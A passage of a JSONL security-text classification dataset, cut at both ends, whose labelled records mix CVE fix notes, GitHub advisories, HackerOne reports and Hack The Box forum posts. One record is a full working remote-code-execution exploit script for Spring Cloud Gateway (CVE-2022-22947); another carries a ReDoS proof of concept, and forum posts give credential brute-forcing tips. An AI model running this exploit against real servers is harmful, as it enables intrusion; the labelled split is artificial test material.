tool in Diffy 3.4.1 does not properly handle double quotes in a filename when run in a windows environment. This allows attackers to execute arbitrary commands via a crafted string.'}]\n\nFix commit: Remove windows specific exec. Open2.capture3 should work on all\nplatforms.", "source": "cvefixes", "timestamp": "2022-06-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "60ded6558c1ad7e0d61d", "text": "I am getting a connection refused error whenever I generate a target ip and try to connect to it in anyway. I cannot nmap scan or do anything with the target. Is anyone experiencing this? Doesnt work on the parrot VM, multiple PCs, multiple browsers and even tried refreshing the IP several times. Examples below image 546×115 9.96 KB", "source": "hackthebox", "timestamp": "2022-12-31", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ccf2ccab397b09e3a355", "text": "I am gonna help you because I received many helps here too. To get the correct results from ffuf, you need to ensure that the IP address after -u contains a http in front (eg http://1.1.1.1 ). In addition, the -H parameter will need to have NO http in front (eg: Host: FUZZ.example.com ). Also remove all your hosts entry related to HTB from /etc/hosts, if any. Should be working after this. Btw your flag 1 is incorrect. You will know once you get the results from ffuf.", "source": "hackthebox", "timestamp": "2022-08-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "696d42df144385bcc999", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based)L, aka Chakra Scripting Engine Memory Corruption Vulnerability. This CVE ID is unique from CVE-2020-0811.", "source": "github_advisory", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f48386d9cc547669016a", "text": "HL7 FHIR Partial Path Zip Slip due to bypass of CVE-2023-24057\n\n[Severity: HIGH]\n\n### Impact\n\nZip Slip protections implemented in CVE-2023-24057 (GHSA-jqh6-9574-5x22) can be bypassed due a partial path traversal vulnerability.\n\nThis issue allows a malicious actor to potentially break out of the `TerminologyCacheManager` cache directory. The impact is limited to sibling directories.\n\nTo demonstrate the vulnerability, consider `userControlled.getCanonicalPath().startsWith(\"/usr/out\")` will allow an attacker to access a directory with a name like `/usr/outnot`. \n\n### Why?\n\nTo demonstrate this vulnerability, consider `\"/usr/outnot\".startsWith(\"/usr/out\")`.\nThe check is bypassed although `/outnot` is not under the `/out` directory.\nIt's important to understand that the terminating slash may be removed when using various `String` representations of the `File` object.\nFor example, on Linux, `println(new File(\"/var\"))` will print `/var`, but `println(new File(\"/var\", \"/\")` will print `/var/`;\nhowever, `println(new File(\"/var\", \"/\").getCanonicalPath())` will print `/var`.\n\n### The Fix\n\nComparing paths with the `java.nio.files.Path#startsWith` will adequately protect againts this vulnerability.\n\nFor example: `file.getCanonicalFile().toPath().startsWith(BASE_DIRECTORY)` or `file.getCanonicalFile().toPath().startsWith(BASE_DIRECTORY_FILE.getCanonicalFile().toPath())`\n\n### Other Examples\n\n - [CVE-2022-31159](https://github.com/aws/aws-sdk-java/security/advisories/GHSA-c28r-hw5m-5gv3) - aws/aws-sdk-java\n - [CVE-2022-23457](https://securitylab.github.com/advisories/GHSL-2022-008_The_OWASP_Enterprise_Security_API/) - ESAPI/esapi-java-legacy\n\n### Vulnerability\n\nhttps://github.com/hapifhir/org.hl7.fhir.core/blob/b0daf666725fa14476d147522155af1e81922aac/org.hl7.fhir.r4b/src/main/java/org/hl7/fhir/r4b/terminologies/TerminologyCacheManager.java#L99-L105\n\nWhile `getAbsolutePath` will return a normalized path, because the string `path` is not slash terminated, the guard can be bypassed to write the contents of the Zip file to a sibling directory of the cache directory.\n\n### Patches\nAll org.hl7.fhir.core libraries should be updated to 5.6.106.\n - https://github.com/hapifhir/org.hl7.fhir.core/pull/1162\n\n### Workarounds\nUnknown\n\n### References\n* https://snyk.io/research/zip-slip-vulnerability\n", "source": "github_advisory", "timestamp": "2023-03-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ecbf76bbbd5d808e1d8a", "text": "XML Injection in Xerces Java affects Nokogiri\n\n[Severity: MEDIUM]\n\n## Summary\n\nNokogiri v1.13.4 updates the vendored `xerces:xercesImpl` from 2.12.0 to 2.12.2, which addresses [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437). That CVE is scored as CVSS 6.5 \"Medium\" on the NVD record.\n\nPlease note that this advisory only applies to the **JRuby** implementation of Nokogiri `< 1.13.4`.\n\n## Mitigation\n\nUpgrade to Nokogiri `>= v1.13.4`.\n\n## Impact\n\n### [CVE-2022-23437](https://nvd.nist.gov/vuln/detail/CVE-2022-23437) in xerces-J\n\n- **Severity**: Medium\n- **Type**: [CWE-91](https://cwe.mitre.org/data/definitions/91.html) XML Injection (aka Blind XPath Injection)\n- **Description**: There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions.\n- **See also**: https://github.com/advisories/GHSA-h65f-jvqw-m9fj\n\n", "source": "github_advisory", "timestamp": "2022-04-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3922f22858eb1088d5e9", "text": "CVE: CVE-2022-27470\n\n[{'lang': 'en', 'value': 'SDL_ttf v2.0.18 and below was discovered to contain an arbitrary memory write via the function TTF_RenderText_Solid(). This vulnerability is triggered via a crafted TTF file.'}]\n\nFix commit: More integer overflow (see bug #187)\nMake sure that 'width + alignment' doesn't overflow, otherwise\nit could create a SDL_Surface of 'width' but with wrong 'pitch'", "source": "cvefixes", "timestamp": "2022-05-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9f255dd4f13c8d85f120", "text": "CVE: CVE-2022-0570\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in Homebrew mruby prior to 3.2.'}]\n\nFix commit: codegen.c: fix a bug in `gen_values()`.\n\n- Fix limit handling that fails 15 arguments method calls.\n- Fix too early argument packing in arrays.", "source": "cvefixes", "timestamp": "2022-02-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "034301d55dfc5b0e562c", "text": "The parrot archive url of “open books” has changed currently its on, https://archive.parrotsec.org/parrot/misc/misc/openbooks/?C=N&O=D Screenshot of the mentioned url: Screenshot_20220112-014126_Chrome 1031×453 32.6 KB", "source": "parrotsec", "timestamp": "2022-01-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "264a13ece136183b79df", "text": "You have the ip address, you need the domain name - so dig it", "source": "hackthebox", "timestamp": "2023-09-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4202bb1c20507ba42cc9", "text": "CVE: CVE-2022-1213\n\n[{'lang': 'en', 'value': 'SSRF filter bypass port 80, 433 in GitHub repository livehelperchat/livehelperchat prior to 3.67v. An attacker could make the application perform arbitrary requests, bypass CVE-2022-1191'}]\n\nFix commit: fix #1752", "source": "cvefixes", "timestamp": "2022-04-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1bf7ee7ac141f8892804", "text": "CVE: CVE-2022-29188\n\n[{'lang': 'en', 'value': 'Smokescreen is an HTTP proxy. The primary use case for Smokescreen is to prevent server-side request forgery (SSRF) attacks in which external attackers leverage the behavior of applications to connect to or scan internal infrastructure. Smokescreen also offers an option to deny access to additional (e.g., external) URLs by way of a deny list. There was an issue in Smokescreen that made it possible to bypass the deny list feature by surrounding the hostname with square brackets (e.g. `[example.com]`). This only impacted the HTTP proxy functionality of Smokescreen. HTTPS requests were not impacted. Smokescreen version 0.0.4 contains a patch for this issue.'}]\n\nFix commit: Fix hostname parsing for square brackets", "source": "cvefixes", "timestamp": "2022-05-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b1bb57d7b551e1a3e62e", "text": "CVE: CVE-2022-23612\n\n[{'lang': 'en', 'value': \"OpenMRS is a patient-based medical record system focusing on giving providers a free customizable electronic medical record system. Affected versions are subject to arbitrary file exfiltration due to failure to sanitize request when satisfying GET requests for `/images` & `/initfilter/scripts`. This can allow an attacker to access any file on a system running OpenMRS that is accessible to the user id OpenMRS is running under. Affected implementations should update to the latest patch version of OpenMRS Core for the minor version they use. These are: 2.1.5, 2.2.1, 2.3.5, 2.4.5 and 2.5.3. As a general rule, this vulnerability is already mitigated by Tomcat's URL normalization in Tomcat 7.0.28+. Users on older versions of Tomcat should consider upgrading their Tomcat instance as well as their OpenMRS instance.\"}]\n\nFix commit: Fix bug", "source": "cvefixes", "timestamp": "2022-02-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ae03edf19ee39efd86c5", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-09-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3dbb8f31706395f90d89", "text": "Okay, I got the flag. Try to use base64 encoding guys and take a good look at “copying”", "source": "hackthebox", "timestamp": "2023-04-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "731b88aa476adb4764ef", "text": "Code injection in ruby git\n\n[Severity: HIGH]\n\nruby-git versions prior to v1.13.0 allows a remote authenticated attacker to execute an arbitrary ruby code by having a user to load a repository containing a specially crafted filename to the product. This vulnerability is different from CVE-2022-46648.", "source": "github_advisory", "timestamp": "2023-01-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8e1e7ebeb92ad2e236df", "text": "I struggled with this particular assessment like every other person trying to solve this challenge. However, I will like to tell you not to give up because patience is the key and sometimes, you have to think outside the box. Clue here is to use username-anarchy firstname lastname to generate possible username, then use cupp -i to generate possible password, don’t be too crazy filling all the parameters, You should be good with firstname, last name, special char and leet. This you can consult with the study material to use sed to remove possible password that doesn’t conform with the password policy. Major take away. Even with the clue above, you gonna find out that it takes forever and you might be feeling frustrated that you’re not on the right path which is something I encountered. But this is where I pull out my think outside the box card. I knew something is wrong somewhere, I immediately make a copy of the generated username, I removed some usernames and only left what I believe might be possible employee usernames in real enterprise environment. Possible user name for Jon Doe j.doe doe.j jon.doe jdoe doej If you follow this pattern, along with the password generated with cupp, you should get the ssh login withing 1-2mins", "source": "hackthebox", "timestamp": "2022-09-12", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3dcc742e7940f990645d", "text": "Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)\n\n# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)\n# Google Dork: N/A\n# Date: 03/03/2022\n# Exploit Author: Carlos E. Vieira\n# Vendor Homepage: https://spring.io/\n# Software Link: https://spring.io/projects/spring-cloud-gateway\n# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1\n# Tested on: 3.1.0\n# CVE : CVE-2022-22947\n\nimport random\nimport string\nimport requests\nimport json\nimport sys\nimport urllib.parse\nimport base64\n\nheaders = { \"Content-Type\": \"application/json\" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}\nproxies = {\n 'http': 'http://172.29.32.1:8081',\n 'https': 'http://172.29.32.1:8081',\n}\nid = ''.join(random.choice(string.ascii_lowercase) for i in range(8))\n\ndef exploit(url, command):\n\n payload = { \"id\": id, \"filters\": [{ \"name\": \"AddResponseHeader\", \"args\": { \"name\": \"Result\", \"value\": \"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\\u0022\"+command+\"\\u0022).getInputStream()))}\"}}],\"uri\": \"http://example.com\"}\n\n commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8')\n\n rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False)\n if(rbase.status_code == 201):\n print(\"[+] Stage deployed to /actuator/gateway/routes/\"+id)\n print(\"[+] Executing command...\")\n r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False)\n if(r.status_code == 200):\n print(\"[+] getting result...\")\n r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)\n if(r.status_code == 200):\n get_response = r.json()\n clean(url, id)\n return get_response['filters'][0].split(\"'\")[1]\n else:\n print(\"[-] Error: Invalid response\")\n clean(url, id)\n exit(1)\n else:\n clean(url, id)\n print(\"[-] Error executing command\")\n\n\ndef clean(url, id):\n remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)\n if(remove.status_code == 200):\n print(\"[+] Stage removed!\")\n else:\n print(\"[-] Error: Fail to remove stage\")\n\ndef banner():\n print(\"\"\"\n ###################################################\n # #\n # Exploit for CVE-2022-22947 #\n # - Carlos Vieira (Crowsec) #\n # #\n # Usage: #\n # python3 exploit.py #\n # #\n # Example: #\n # python3 exploit.py http://localhost:8080 'id' #\n # #\n ###################################################\n \"\"\")\n\ndef main():\n banner()\n if len(sys.argv) != 3:\n print(\"[-] Error: Invalid arguments\")\n print(\"[-] Usage: python3 exploit.py \")\n exit(1)\n else:\n url = sys.argv[1]\n command = sys.argv[2]\n print(exploit(url, command))\nif __name__ == '__main__':\n main()", "source": "exploitdb", "timestamp": "2022-03-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "024ee216ec85fff74232", "text": "[Deserialization of Untrusted Data] [CVE-2023-27531] Possible Deserialization of Untrusted Data vulnerability in Kredis JSON\n\nI made a report and patch at https://hackerone.com/reports/1702859 .\n\nhttps://discuss.rubyonrails.org/t/cve-2023-27531-possible-deserialization-of-untrusted-data-vulnerability-in-kredis-json/82467\n\n> There is a deserialization of untrusted data vulnerability in the Kredis JSON deserialization code. This vulnerability has been assigned the CVE identifier CVE-2023-27531.\n\n## Impact\n\n> Carefully crafted JSON data processed by Kredis may result in deserialization of untrusted data, potentially leading to deserialization of unexpected objects in the system.", "source": "hackerone", "timestamp": "2023-08-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "ea9dc159a1b6c6fd8bf0", "text": "CVE: CVE-2022-31063\n\n[{'lang': 'en', 'value': 'Tuleap is a Free & Open Source Suite to improve management of software developments and collaboration. In versions prior to 13.9.99.111 the title of a document is not properly escaped in the search result of MyDocmanSearch widget and in the administration page of the locked documents. A malicious user with the capability to create a document could force victim to execute uncontrolled code. Users are advised to upgrade. There are no known workarounds for this issue.'}]\n\nFix commit: request #27173: XSS via the title of a document\n\nChange-Id: Ibdae4792b76c297bf8d553ab9b37f5ae3d76cb2a", "source": "cvefixes", "timestamp": "2022-06-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a6848148672d35996fa8", "text": "CVE: CVE-2021-23520\n\n[{'lang': 'en', 'value': 'The package juce-framework/juce before 6.1.5 are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) via the ZipFile::uncompressEntry function in juce_ZipFile.cpp. This vulnerability is triggered when the archive is extracted upon calling uncompressTo() on a ZipFile object.'}]\n\nFix commit: ZipFile: Add path checks to uncompressEntry()", "source": "cvefixes", "timestamp": "2022-01-31", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c6277e89f7c8efd1f424", "text": "CVE: CVE-2022-1233\n\n[{'lang': 'en', 'value': 'URL Confusion When Scheme Not Supplied in GitHub repository medialize/uri.js prior to 1.19.11.'}]\n\nFix commit: fix(parse): handle excessive slashes in scheme-relative URLs\n\nreported by @zeyu2001 via huntr.dev", "source": "cvefixes", "timestamp": "2022-04-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fd1933d517bbdcfcfe7d", "text": "CVE: CVE-2022-2522\n\n[{'lang': 'en', 'value': 'Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0061.'}]\n\nFix commit: patch 9.0.0061: ml_get error with nested autocommand\n\nProblem: ml_get error with nested autocommand.\nSolution: Also check line numbers for a nested autocommand. (closes #10761)", "source": "cvefixes", "timestamp": "2022-07-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0b9e1a064242fddbc58b", "text": "CVE: CVE-2022-1735\n\n[{'lang': 'en', 'value': 'Classic Buffer Overflow in GitHub repository vim/vim prior to 8.2.4969.'}]\n\nFix commit: patch 8.2.4969: changing text in Visual mode may cause invalid memory access\n\nProblem: Changing text in Visual mode may cause invalid memory access.\nSolution: Check the Visual position after making a change.", "source": "cvefixes", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "1a85e4335c4f1995acfd", "text": "CVE: CVE-2022-21648\n\n[{'lang': 'en', 'value': 'Latte is an open source template engine for PHP. Versions since 2.8.0 Latte has included a template sandbox and in affected versions it has been found that a sandbox escape exists allowing for injection into web pages generated from Latte. This may lead to XSS attacks. The issue is fixed in the versions 2.8.8, 2.9.6 and 2.10.8. Users unable to upgrade should not accept template input from untrusted sources.'}]\n\nFix commit: PhpWriter: complex expression in strings prohibited in sandbox mode", "source": "cvefixes", "timestamp": "2022-01-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "44c3e00d711d41cbb8c3", "text": "another tip is to use filters as a range… I notice that errors has all the same size lets say 50 so you can use -fs 50-51 at the end to filter the errors and -mc 200 to show only the 200 ok responses. Another thing is, if you use the HTB virtual machine from the web you should get the wordlist from /usr/share/dirb/wordlists/common.txt you have the first 3 flags from there… I found 5 vhost but one of the flags are not correct and the ‘d’ one is tricky.", "source": "hackthebox", "timestamp": "2023-09-07", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "63d41658edb40966d653", "text": "Sqlmap Cheat Sheet: Commands, Options, and Advanced Features\n\nHi, Here another nice share from StationX! Enjoy!!! Sqlmap Cheat Sheet: Commands, Options, and Advanced Features StationX – 20 Oct 22 Sqlmap Cheat Sheet: Commands, Options, and Advanced Features Use this comprehensive sqlmap cheat sheet to easily lookup any command you need. It includes a special search and copy function. Download cheat sheets here: https://drive.google.com/drive/folders/132ptAPFrhVZAV5dMMK6Jk9HSA4UJl7Du", "source": "hackersploit", "timestamp": "2023-02-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "42a2774f3de808950d5d", "text": "CVE: CVE-2022-1444\n\n[{'lang': 'en', 'value': 'heap-use-after-free in GitHub repository radareorg/radare2 prior to 5.7.0. This vulnerability is capable of inducing denial of service.'}]\n\nFix commit: Redo minor cleanup in new_rbtree", "source": "cvefixes", "timestamp": "2022-04-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "67210f5b2c906b1c625a", "text": "CVE: CVE-2022-29779\n\n[{'lang': 'en', 'value': 'Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_value_own_enumerate at src/njs_value.c.'}]\n\nFix commit: Fixed Array.prototype.slice() with slow \"this\" argument.\n\nPreviously, when \"this\" argument was not a fast array, but the \"deleted\" array\nwas a fast array, the \"deleted\" array may be left in uninitialized state if\n\"this\" argument had gaps.\n\nThis fix is to ensure that \"deleted\" is properly initialized.\n\nThis fixes #485 issue on Github.", "source": "cvefixes", "timestamp": "2022-06-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4a029229153730eeb106", "text": "Test code in published microsoft-graph-core package exposes phpinfo()\n\n[Severity: MEDIUM]\n\n### Impact\n\nThe Microsoft Graph Core PHP SDK published packages which contained test code that enabled the use of the phpInfo() function from any application that could access and execute the file at vendor/microsoft/microsoft-graph-core/tests/GetPhpInfo.php. The phpInfo function exposes system information. \n\nThe vulnerability affects the GetPhpInfo.php script of the PHP SDK which contains a call to the phpinfo() function. \n\nThis vulnerability requires a misconfiguration of the server to be present so it can be exploited. For example, making the PHP application’s /vendor directory web accessible. \n\nThe combination of the vulnerability and the server misconfiguration would allow an attacker to craft an HTTP request that executes the phpinfo() method. The attacker would then be able to get access to system information like configuration, modules, and environment variables and later on use the compromised secrets to access additional data.\n\n### Patches\n\nThis problem has been patched in version 2.0.2.\n\n### Workarounds\n\nIf an immediate deployment with the updated vendor package is not available, you can perform the following temporary workarounds:\n- delete the vendor/microsoft/microsoft-graph-core/tests/GetPhpInfo.php file\n- remove access to the /vendor directory will remove this vulnerability\n- disable the phpinfo function\n\n### References\nFor more information about the vulnerability and the patch, users can refer to the following sources: \n\n- https://nvd.nist.gov/vuln/detail/CVE-2023-49103\n- https://github.com/microsoftgraph/msgraph-beta-sdk-php/compare/2.0.0...2.0.1 \n- https://github.com/microsoftgraph/msgraph-sdk-php-core/compare/2.0.1...2.0.2 \n- https://github.com/microsoftgraph/msgraph-sdk-php/compare/1.109.0...1.109.1 \n- https://owncloud.com/security-advisories/disclosure-of-sensitive-credentials-and-configuration-in-containerized-deployments/ ", "source": "github_advisory", "timestamp": "2023-12-05", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7b572a7ca3c7bb00673b", "text": "[Uncontrolled Resource Consumption] @nextcloud/logger NPM package brings vulnerable ansi-regex version\n\n## Summary:\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to the sub-patterns [[\\\\]()#;?]* and (?:;[-a-zA-Z\\\\d\\\\/#&.:=?%@~_]*)*.\n\n## Details: \nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\n## Steps To Reproduce:\n\n 1. First I download the code (https://github.com/nextcloud/password_policy) I usual cat files and See the technologies that the site use and its versions I Found that You use `ansi-regex`\n 2. then I cat every file and find in package-lock.json has the version I have the versions of the ansi-regex with a lot of versions there some of some vulnerable and other update to the latest version and the vulnerable paths is \n```json\n},\n\t\t\t\t\"strip-ansi\": {\n\t\t\t\t\t\"version\": \"3.0.1\",\n\t\t\t\t\t\"resolved\": \"https://registry.npmjs.org/strip-ansi/-/strip-ansi-3.0.1.tgz\",\n\t\t\t\t\t\"integrity\": \"sha1-ajhfuIU9lS1f8F0Oiq+UJ43GPc8=\",\n\t\t\t\t\t\"requires\": {\n\t\t\t\t\t\t\"ansi-regex\": \"^2.0.0\"\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\t\t\"has-ansi\": {\n\t\t\t\"version\": \"2.0.0\",\n\t\t\t\"resolved\": \"https://registry.npmjs.org/has-ansi/-/has-ansi-2.0.0.tgz\",\n\t\t\t\"integrity\": \"sha1-NPUEnOHs3ysGSa8+8k5F7TVBbZE=\",\n\t\t\t\"requires\": {\n\t\t\t\t\"ansi-regex\": \"^2.0.0\"\n\t\t\t},\n\n\t\t\t\"dependencies\": {\n\t\t\t\t\"ansi-regex\": {\n\t\t\t\t\t\"version\": \"2.1.1\",\n\t\t\t\t\t\"resolved\": \"https://registry.npmjs.org/ansi-regex/-/ansi-regex-2.1.1.tgz\",\n\t\t\t\t\t\"integrity\": \"sha1-w7M6te42DYbg5ijwRorn7yfWVN8=\"\n\t\t\t\t}\n\n\t\t\t\t\"node_modules/babel-code-frame/node_modules/ansi-regex\": {\n\t\t\t\"version\": \"2.1.1\",\n\t\t\t\"resolved\": \"https://registry.npmjs.org/ansi-regex/-/ansi-regex-2.1.1.tgz\",\n\t\t\t\"integrity\": \"sha1-w7M6te42DYbg5ijwRorn7yfWVN8=\",\n\t\t\t\"engines\": {\n\t\t\t\t\"node\": \">=0.10.0\"\n\t\t\t}\n\t\t},\n\t\t\"node_modules/babel-code-frame/node_modules/strip-ansi\": {\n\t\t\t\"version\": \"3.0.1\",\n\t\t\t\"resolved\": \"https://registry.npmjs.org/strip-ansi/-/strip-ansi-3.0.1.tgz\",\n\t\t\t\"integrity\": \"sha1-ajhfuIU9lS1f8F0Oiq+UJ43GPc8=\",\n\t\t\t\"dependencies\": {\n\t\t\t\t\"ansi-regex\": \"^2.0.0\"\n\t\t\t}\n\t\t\t\"node_modules/has-ansi/node_modules/ansi-regex\": {\n\t\t\t\"version\": \"2.1.1\",\n\t\t\t\"resolved\": \"https://registry.npmjs.org/ansi-regex/-/ansi-regex-2.1.1.tgz\",\n\t\t\t\"integrity\": \"sha1-w7M6te42DYbg5ijwRorn7yfWVN8=\",\n\t\t\t\"engines\": {\n\t\t\t\t\"node\": \">=0.10.0\"\n\t\t\t}\n\t\t},\n```\n3. then I found that every version of ansi-regex before 4.1.1 as you see in the code you use 2.11,2.0.0,3.0.1 and these versions are vulnerable to Regular Expression Denial of Service (ReDoS) as every policy that Denial of service attack is out of scope so I didn't try anything to not make any damage to your work but I want to report it to you to investigate on that and update to the fixed version to denied this attack from happening. \n4. this is a poc that attacker can use to \n\n#POC\n```\nimport ansiRegex from 'ansi-regex';\n\nfor(var i = 1; i <= 50000; i++) { var time = Date.now(); var attack_str = \"\\u001B[\"+\";\".repeat(i*10000); ansiRegex().test(attack_str) var time_cost = Date.now() - time; console.log(\"attack_str.length: \" + attack_str.length + \": \" + time_cost+\" ms\") \n```\n# Fix: \nupdate to these (4.1.1, 5.0.1, and 6.0.1) like you do in most of your code. \n\n## Supporting Materials:\n\nthis useful links that can you check on this vuln\n1. https://www.cve.org/CVERecord?id=CVE-2021-3807\n2. https://cwe.mitre.org/data/definitions/400.html\n3. https://security.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908\n\n## Impact\n\nthe attacker aimed at making a system inaccessible t", "source": "hackerone", "timestamp": "2022-07-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "86a3c0a235f5154eecb5", "text": "CVE: CVE-2022-35414\n\n[{'lang': 'en', 'value': 'softmmu/physmem.c in QEMU through 7.0.0 can perform an uninitialized read on the translate_fail path, leading to an io_readx or io_writex crash.'}]\n\nFix commit: target/loongarch: Clean up tlb when cpu reset\n\nWe should make sure that tlb is clean when cpu reset.\n\nSigned-off-by: Song Gao \nMessage-Id: <20220705070950.2364243-1-gaosong@loongson.cn>\nReviewed-by: Richard Henderson \nSigned-off-by: Richard Henderson ", "source": "cvefixes", "timestamp": "2022-07-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "382b7c508efcf3b9c3fb", "text": "CVE: CVE-2022-23626\n\n[{'lang': 'en', 'value': 'm1k1o/blog is a lightweight self-hosted facebook-styled PHP blog. Errors from functions `imagecreatefrom*` and `image*` have not been checked properly. Although PHP issued warnings and the upload function returned `false`, the original file (that could contain a malicious payload) was kept on the disk. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue.'}]\n\nFix commit: check image create errors.", "source": "cvefixes", "timestamp": "2022-02-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "432e6424adc64f83bbed", "text": "Every time I spawned the target, it was normal at first. After a few seconds, I can’t connect to the target. image 665×304 12.5 KB", "source": "hackthebox", "timestamp": "2022-10-19", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d2f35762bd36eb52159d", "text": "I can’t get the lab to work. I tried now for 5 days to get it working. Normally I use my own kali linux Visual Studio Codium in Python, but for C# it is a struggle with the libraries import ??? I did all the sections, except the Skills Assessment. I also tried Visual Studio Code and even installed on my Windows machine Visual Studio but I keep getting stuck on library Assessment.dll. I need this for knowing the paths to smuggler the Apache server because it’s vulnerable. With Ffuf I did not succeed. Furthermore I tried to parse the .dll for the wordlist but no success either. Please help me to get the last flag to finish this HTB module!!!", "source": "hackthebox", "timestamp": "2023-10-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "94c26aad028cececd693", "text": "About the Reset Token: It took me 2 days to get all the details right! How i solved it: – The Token formation schema is the same as the CVE indeed – Python Script Implementing Threads (you will send a couple thousand of requests) – “Epoch in Milliseconds” is int(round(time.time() * 1000) in Python – Fire the first request (htbuser) to create and then fire the guessings for the htbadmin in the script – i did use a wider interval T-2000 T+2000 Obs: you wont be able to match the HTBUSER token unless you know exactly the milliseconds when it was created (and you dont need it, dont waste time with that).", "source": "hackthebox", "timestamp": "2023-10-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9d06e64e3011d7c7e57e", "text": "CVE: CVE-2022-24728\n\n[{'lang': 'en', 'value': 'CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4 prior to version 4.18.0. The vulnerability allows someone to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. This problem has been patched in version 4.18.0. There are currently no known workarounds.'}]\n\nFix commit: Code refactoring.", "source": "cvefixes", "timestamp": "2022-03-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0674b900968eaac06d6e", "text": "How to gain experience in web pentesting?\n\nHI guys. I know how to do web pentest theoretically but I don’t have a experience about it. I mean I have worked with just vulnerable machines not real web sites. So what do you recommend me. I don’t even know how to write a report. Where should I start ?", "source": "hackersploit", "timestamp": "2022-10-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4b686cd96319fe7e749b", "text": "Test code in published microsoft-graph-beta package exposes phpinfo()\n\n[Severity: MEDIUM]\n\n### Impact\n\nThe Microsoft Graph Beta PHP SDK published packages which contained test code that enabled the use of the phpInfo() function from any application that could access and execute the file at vendor/microsoft/microsoft-graph-beta/tests/GetPhpInfo.php. The phpInfo function exposes system information. \n\nThe vulnerability affects the GetPhpInfo.php script of the PHP SDK which contains a call to the phpinfo() function. \n\nThis vulnerability requires a misconfiguration of the server to be present so it can be exploited. For example, making the PHP application’s /vendor directory web accessible. 